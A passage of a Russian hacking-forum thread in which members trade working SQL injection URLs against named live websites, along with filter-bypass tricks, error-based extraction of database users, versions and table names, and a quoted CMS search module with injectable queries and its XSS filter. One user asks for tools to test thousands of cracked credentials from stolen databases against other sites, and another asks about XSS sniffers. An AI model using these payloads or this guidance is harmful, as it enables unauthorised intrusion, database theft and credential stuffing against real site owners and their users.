Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Вариант 1: Не использовать функции
    Вариант 2: Проверить, попадают ли данные из какой-либо колонки в другой запрос, и есть ли там инъекция. Если да - то можно обойти фильтр посылая данные второй инъекции хексом в колонку.
    Вариант 3: NULL-byte, не соответствующие друг другу скобки, Комментарии /*! SQL*/, Символ переноса строки между скобками при фильтре парных скобок version(%0A%0D), etc
    В MySQL хекс используется только для строк. Захексить функцию, или весь запрос вам не удастся.
     
    #22501 randman, 22 Sep 2013
    Last edited: 22 Sep 2013
    2 people like this.
  2. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://np.com.ua/search.html?keywords=1'+order+by+2+--+
    http://np.com.ua/search.html?keywords=1'+union+SELECT+1,2+--+
    Как быть?
     
  3. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    Инъекция в MSSQL, фильтрация всех спецсимволов - (),;`"':[]@ hex не помогает, подсказки есть?
     
    #22503 infoseller, 26 Sep 2013
    Last edited: 26 Sep 2013
  4. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Используется несколько запросов с одним и тем же параметром

    Code:
    <?php 
    /* system/modules/msm_Catalog/MsmSearchBox.php */
    
    if (!defined('TL_ROOT')) die('You can not access this file directly!');
    class MsmSearchBox extends Module {
        
        protected $strTemplate = 'fe_search_box';
            
        protected function compile() {
            
            if ( $this->Input->get('keywords') ) {
      /* Входные данные не фильтруются должным образом--->*/          $title = $this->Input->get('keywords');
            } else if ( $this->Input->post('keywords') ) {
       /* Въодные данные не фильтруются должным образом(пост)--->*/          $title = $this->Input->post('keywords');
            }
            
            $total = 0;
      /* first inject ---->>*/      $db = $this->Database->execute(" SELECT id,pid,title,short_comment FROM tl_msm_catalog_item WHERE title LIKE '%". $title ."%' OR short_comment LIKE '%". $title ."%' ");
            $total += $db->numRows;
            
            $array = array();
            while ( $db->next() ) {
                
                $view = str_replace("<p>", "", $db->short_comment);
                $view = str_replace("</p>", "", $view);
                $array[] = array(
                    'title' =>  $db->title,
                    'href'	=>  $this->generateFrontendUrl('','thermal-aid/ccategory/'.$db->pid.'/product/'.$db->id.'/'.$this->setTranslite($db->title)),
                    'short' =>  $view,
                );
            }
            
       /* second inject ---->>*/     $db32 = $this->Database->execute(" SELECT id,pid,title FROM tl_msm_catalog WHERE title LIKE '%". $title ."%' ");
            $total += $db32->numRows;
            
            while ( $db32->next() ) {
                
                $array[] = array(
                    'title' =>  $db32->title,
                    'href'	=>  $this->generateFrontendUrl('','thermal-aid/category/'.$db32->pid.'/scategory/'.$db32->id)
                );
            }
            
      /* another one ----->>*/      $db1 = $this->Database->execute(" SELECT id,pid,title,short_about FROM tl_msm_mclass_file WHERE title LIKE '%". $title ."%' OR short_about LIKE '%". $title ."%' ");
            $total += $db1->numRows;
    
    Code:
    /* system/libraries/Input.php */
    
    public function get($strKey, $blnDecodeEntities=false)
    	{
    		$strCacheKey = $blnDecodeEntities ? 'getDecoded' : 'getEncoded';
    
    		if (!isset($this->arrCache[$strCacheKey][$strKey]))
    		{
    			$varValue = $_GET[$strKey];
    
    			if (is_null($varValue))
    			{
    				return $varValue;
    			}
    
    			$varValue = $this->stripSlashes($varValue);
    			$varValue = $this->decodeEntities($varValue);
    			$varValue = $this->xssClean($varValue, true);
    			$varValue = $this->stripTags($varValue);
    
    			if (!$blnDecodeEntities)
    			{
    				$varValue = $this->encodeSpecialChars($varValue);
    			}
    
    			$this->arrCache[$strCacheKey][$strKey] = $varValue;
    		}
    
    		return $this->arrCache[$strCacheKey][$strKey];
    	}
    
    
    	/**
    	 * Return a $_POST parameter
    	 * @param string
    	 * @param boolean
    	 * @return mixed
    	 */
    	public function post($strKey, $blnDecodeEntities=false)
    	{
    		$strCacheKey = $blnDecodeEntities ? 'postDecoded' : 'postEncoded';
    
    		if (!isset($this->arrCache[$strCacheKey][$strKey]))
    		{
    			$varValue = $this->findPost($strKey);
    
    			if (is_null($varValue))
    			{
    				return $varValue;
    			}
    
    			$varValue = $this->stripSlashes($varValue);
    			$varValue = $this->decodeEntities($varValue);
    			$varValue = $this->xssClean($varValue, true);
    			$varValue = $this->stripTags($varValue);
    
    			if (!$blnDecodeEntities)
    			{
    				$varValue = $this->encodeSpecialChars($varValue);
    			}
    
    			$this->arrCache[$strCacheKey][$strKey] = $varValue;
    		}
    
    		return $this->arrCache[$strCacheKey][$strKey];
    	}
    
    
    
    protected function stripSlashes($varValue)
    	{
    		if (is_null($varValue) || $varValue == '')
    		{
    			return $varValue;
    		}
    
    		// Recursively clean arrays
    		if (is_array($varValue))
    		{
    			foreach ($varValue as $k=>$v)
    			{
    				$varValue[$k] = $this->stripSlashes($v);
    			}
    
    			return $varValue;
    		}
    
    		if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc())
    		{
    			$varValue = stripslashes($varValue);
    		}
    
    		return $varValue;
    	}
    
    
    protected function decodeEntities($varValue)
    	{
    		if (is_null($varValue) || $varValue == '')
    		{
    			return $varValue;
    		}
    
    		// Recursively clean arrays
    		if (is_array($varValue))
    		{
    			foreach ($varValue as $k=>$v)
    			{
    				$varValue[$k] = $this->decodeEntities($v);
    			}
    
    			return $varValue;
    		}
    
    		// Preserve basic entities
    		$varValue = $this->preserveBasicEntities($varValue);
    		$varValue = html_entity_decode($varValue, ENT_COMPAT, $GLOBALS['TL_CONFIG']['characterSet']);
    
    		return $varValue;
    	}
    
    protected function stripTags($varValue, $strAllowedTags='')
    	{
    		if (is_null($varValue) || $varValue == '')
    		{
    			return $varValue;
    		}
    
    		// Recursively clean arrays
    		if (is_array($varValue))
    		{
    			foreach ($varValue as $k=>$v)
    			{
    				$varValue[$k] = $this->stripTags($v, $strAllowedTags);
    			}
    
    			return $varValue;
    		}
    
    		$varValue = str_replace(array('<!--','<![', '-->'), array('&lt;!--', '&lt;![', '--&gt;'), $varValue);
    		$varValue = strip_tags($varValue, $strAllowedTags);
    		$varValue = str_replace(array('&lt;!--', '&lt;![', '--&gt;'), array('<!--', '<![', '-->'), $varValue);
    
    		return $varValue;
    	}
    
    
    protected function xssClean($varValue, $blnStrictMode=false)
    	{
    		if (is_null($varValue) || $varValue == '')
    		{
    			return $varValue;
    		}
    
    		// Recursively clean arrays
    		if (is_array($varValue))
    		{
    			foreach ($varValue as $k=>$v)
    			{
    				$varValue[$k] = $this->xssClean($v);
    			}
    
    			return $varValue;
    		}
    
    		// Return if var is not a string
    		if (is_bool($varValue) || is_null($varValue) || is_numeric($varValue))
    		{
    			return $varValue;
    		}
    
    		// Validate standard character entites and UTF16 two byte encoding
    		$varValue = preg_replace('/(&#*\w+)[\x00-\x20]+;/i', '$1;', $varValue);
    		$varValue = preg_replace('/(&#x*)([0-9a-f]+);/i', '$1$2;', $varValue);
    
    		// Remove carriage returns
          	$varValue = preg_replace('/\r+/', '', $varValue);
    
          	// Replace unicode entities
    		$varValue = utf8_decode_entities($varValue);
    
    		// Remove NULL characters
    		$varValue = preg_replace('/\0+/', '', $varValue);
    		$varValue = preg_replace('/(\\\\0)+/', '', $varValue);
    
    		$arrKeywords = array
    		(
    			'/\bj\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\b/is', // javascript
    			'/\bv\s*b\s*s\s*c\s*r\s*i\s*p\s*t\b/is', // vbscript
    			'/\bv\s*b\s*s\s*c\s*r\s*p\s*t\b/is', // vbscrpt
    			'/\bs\s*c\s*r\s*i\s*p\s*t\b/is', //script
    			'/\ba\s*p\s*p\s*l\s*e\s*t\b/is', // applet
    			'/\ba\s*l\s*e\s*r\s*t\b/is', // alert
    			'/\bd\s*o\s*c\s*u\s*m\s*e\s*n\s*t\b/is', // document
    			'/\bw\s*r\s*i\s*t\s*e\b/is', // write
    			'/\bc\s*o\s*o\s*k\s*i\s*e\b/is', // cookie
    			'/\bw\s*i\s*n\s*d\s*o\s*w\b/is' // window
    		);
    
    		// Compact exploded keywords like "j a v a s c r i p t"
    		foreach ($arrKeywords as $strKeyword)
    		{
    			$arrMatches = array();
    			preg_match_all($strKeyword, $varValue, $arrMatches);
    
    			foreach ($arrMatches[0] as $strMatch)
    			{
    				$varValue = str_replace($strMatch, preg_replace('/\s*/', '', $strMatch), $varValue);
    			}
    		}
    
    		$arrRegexp[] = '/<(a|img)[^>]*[^a-z](<script|<xss)[^>]*>/is';
    		$arrRegexp[] = '/<(a|img)[^>]*[^a-z]document\.cookie[^>]*>/is';
    		$arrRegexp[] = '/<(a|img)[^>]*[^a-z]vbscri?pt\s*:[^>]*>/is';
    		$arrRegexp[] = '/<(a|img)[^>]*[^a-z]expression\s*\([^>]*>/is';
    
    		// Also remove event handlers and JavaScript in strict mode
    		if ($blnStrictMode)
    		{
    			$arrRegexp[] = '/vbscri?pt\s*:/is';
    			$arrRegexp[] = '/javascript\s*:/is';
    			$arrRegexp[] = '/<\s*embed.*swf/is';
    			$arrRegexp[] = '/<(a|img)[^>]*[^a-z]alert\s*\([^>]*>/is';
    			$arrRegexp[] = '/<(a|img)[^>]*[^a-z]javascript\s*:[^>]*>/is';
    			$arrRegexp[] = '/<(a|img)[^>]*[^a-z]window\.[^>]*>/is';
    			$arrRegexp[] = '/<(a|img)[^>]*[^a-z]document\.[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onabort\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onblur\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onchange\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onclick\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onerror\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onfocus\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onkeypress\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onkeydown\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onkeyup\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onload\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onmouseover\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onmouseup\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onmousedown\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onmouseout\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onreset\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onselect\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onsubmit\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onunload\s*=[^>]*>/is';
    			$arrRegexp[] = '/<[^>]*[^a-z]onresize\s*=[^>]*>/is';
    		}
    
    		return preg_replace($arrRegexp, '', $varValue);
    	}
    
    
    
    protected function encodeSpecialChars($varValue)
    	{
    		if (is_null($varValue) || $varValue == '')
    		{
    			return $varValue;
    		}
    
    		// Recursively clean arrays
    		if (is_array($varValue))
    		{
    			foreach ($varValue as $k=>$v)
    			{
    				$varValue[$k] = $this->encodeSpecialChars($v);
    			}
    
    			return $varValue;
    		}
    
    		$arrSearch = array('#', '<', '>', '(', ')', '\\', '=');
      /* replacing (, ), backslash, etc ------>> */		$arrReplace = array('#', '<', '>', '(', ')', '\', '=');
    
    		return str_replace($arrSearch, $arrReplace, $varValue);
    	}
    
    
    
    Как наглядно показано, функция stripslashes используется весьма своевременно, что позволяет игнорировать включенный magic_quotes http://np.com.ua/phpinfo.php
    Но, в свою очередь, происходит реплейс скобок, что не позволяет нам должным образом конструировать запрос

    Code:
    public function execute()
    	{
    		$arrParams = func_get_args();
    
    		if (is_array($arrParams[0]))
    		{
    			$arrParams = array_values($arrParams[0]);
    		}
    
    		$this->replaceWildcards($arrParams);
    		$strKey = md5($this->strQuery);
    
    		// Try to load the result from cache
    		if (isset(self::$arrCache[$strKey]) && !self::$arrCache[$strKey]->isModified)
    		{
    			return self::$arrCache[$strKey]->reset();
    		}
    
    		$objResult = $this->query();
    
    		// Cache the result objects
    		if ($objResult instanceof Database_Result)
    		{
    			self::$arrCache[$strKey] = $objResult;
    		}
    
    		return $objResult;
    	}
    
    
    
    
    public function query($strQuery='')
    	{
    		if (!empty($strQuery))
    		{
    			$this->strQuery = $strQuery;
    		}
    
    		// Make sure there is a query string
    		if ($this->strQuery == '')
    		{
    			throw new Exception('Empty query string');
    		}
    
    		// Execute the query
    /* Наш эксепшн ----->> */		if (($this->resResult = $this->execute_query()) == false)
    		{
    			throw new Exception(sprintf('Query error: %s (%s)', $this->error, $this->strQuery));
    		}
    
    		// No result set available
    		if (!is_resource($this->resResult) && !is_object($this->resResult))
    		{
    			$this->debugQuery();
    			return $this;
    		}
    
    		// Instantiate a result object
    		$strClass = DB_DRIVER . '_Result';
    		$objResult = new $strClass($this->resResult, $this->strQuery);
    		$this->debugQuery($objResult);
    
    		return $objResult;
    	}
    
    Раскручивание еррор/блайнд/тайм байсед весьма огранничеено, учитывая что скобкам наступает фаталити. А классика обрывается из-за нескольких запросов. Чтобы найти выход из этой ситуации, придется подумать, либо написать мне в пм

    На каком уровне идет фильтрация?
     
    1 person likes this.
  5. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Давненько нащупал, но так и не разобрал.

    Переменная заносится в массив по пробелам, используется в минимум трех запросах, но ничего конкретного не смог подобрать.
     
  6. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    198
    Likes Received:
    12
    Reputations:
    -7
    http://www.belarusinfo.by/ru/poisk/1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'

    Duplicate column name '5.0.77'
     
    RedX and YaBtr like this.
  7. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    На уровне вэбсервера
     
  8. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Прошу помощи.
    Скачал у одного перца несколько баз данных, набрутил пару тысяч хэшей.
    Вроде неплохо, но что дальше?
    Знаю, что базы не его, он их где-то сдампил. Знаю пару десятков сайтов, которые его интересуют. Т.е., базы наверняка с них, но какая откуда - непонятно, да и старые они - от 2-х до 4-х лет. Решил подбирать пару логин-пароль по тем пользователям, которых набрутил. Но 2 тысячи на 2 десятка сайтов... Я повешусь быстрее. Подскажите софт для такой операции.
    Спасибо
     
  9. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Уже как я над ними не изощрялся, не могу вывести -((
    Code:
    http://www.anuch.com/moto.php?strana=21&roku=-2005+union+select+version%28%29+--+&&id=3103
    http://www.hondaalpina.com.br/moto.php?id=-3+un%0Bion+sel%0Bect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
    http://www.motovendo.cl/motovendo/datos-moto.php?view=-2319+order+by+1+--+
    http://jpland.ru/mototehnika.php?category_id=09999999+union+select+1,2,3,4,5,6,7,8,9,10+--+
    http://cluboe3.orf.at/index.php?pageID=201+And+1=0%27+order+by+1+--+
    http://adorama.gr/e-shop/Products.php?lang=en&CatID=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
    http://www.ivrus.biz/showcat.php?id=-10%27%29%27+union+select+1,2,3+--+
     
  10. Fake22

    Fake22 New Member

    Joined:
    4 May 2013
    Messages:
    73
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! Я новичок в этих делах.. и хотел бы научится взламывать сайты... я плохого ни чего ни хочу. Просто хочу знать как это делается... Я начну создавать сайты в будущем и пока я не пойму как взламывают сайт то я и не смогу его защитить... просто это мое мнение! можно по шаговую статью о том что мне надо понять и где все это про тестировать? Заранее спасибо...
     
  11. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Code:
    http://www.anuch.com/view.php?id=40350000%27%20union%20all%20select%20999,user%28%29,999,999,version%28%29,6999,999+--+&&strana=27&&roku=2011.09
    http://www.motovendo.cl/motovendo/datos-moto.php?view=3%27-%271%27,1,1,1,1%20and%20%28extractvalue%281,concat%280x3b,user%28%29%29%29%29%29+--+
    http://adorama.gr/e-shop/Products.php?lang=en&CatID=-10 or(extractvalue(1,concat(0x3b,user()))) --
    http://jpland.ru/mototehnika.php?id=160%27%20UNION%20SELECT%20user%28%29,2,3,4,version%28%29,6,7,8,9,10+--+
    http://cluboe3.orf.at/index.php?pageID=201%27%20and%20extractvalue%281,concat%280x3b,user%28%29%29%29%20and%20%27
    http://www.hondaalpina.com.br/moto.php?id=3911/**//*!uNiOn*//**//*!SELECT*/1/*!,*/2/*!,*/user%28%29/*!,*/4/*!,*/5/*!,*/6/*!,*/7/*!,*/8/*!,*/9/*!,*/10/*!,*/11/*!,*/12/*!,*/13/*!,*/14/*!,*/15/*!,*/16/*!,*/17/*!,*/18/*!,*/19/*!,*/20/*!,*/21/*!,*/22+--+
    http://www.ivrus.biz/photoarchive.php?id=14%20UNION%20SELECT%201,2,3,user%28%29,version%28%29,6,7
    
     
    #22511 Inoms, 28 Sep 2013
    Last edited: 29 Sep 2013
    1 person likes this.
  12. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Помогите раскрутить такую скулю на mssql

    id=15&type='+convert(int,@@version)+'

    выводит:
    [Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

    Как дальше крутитЬ?
     
    #22512 Sanic1977, 29 Sep 2013
    Last edited: 29 Sep 2013
  13. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    https://rdot.org/forum/showthread.php?t=826
     
  14. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Что может означать такая ошибка?
    выпадает в поле логин - %5C
    Warning: PDOStatement::execute(): SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5ebe553e01799a927b1d045924bbd4fd' AND status='ok'' at line 1 in /var/www/site/data/www/site.ru/application/class/Member.php on line 390
     
  15. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    '%2bconvert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))%2b'

    выдает ошибку

    Subqueries are not allowed in this context. Only scalar expressions are allowed.

    и как его обойти?
     
    #22515 Sanic1977, 29 Sep 2013
    Last edited: 7 Oct 2013
  16. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Нельзя использовать в качестве параметра запрос.
    Может сделать прощще:

    1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
     
  17. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Добрый день, скажите пожалуйста каким сниффером вы пользуетесь для XSS
     
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.
    Code:
    www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
    http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
    http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
     
  19. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://www.ukok-tour.ru/index.php?t=1'and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)='and+--+
     
  20. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    114
    Likes Received:
    27
    Reputations:
    26
    Code:
    http://www.isotropix.com/index.php?to=products&productid=991 AND extractvalue(1,concat(0x3a,(select version() limit 0,1)))
    в третьем случае нет инъекции
     
    #22520 Ravenous, 2 Oct 2013
    Last edited: 2 Oct 2013
Loading...
Thread Status:
Not open for further replies.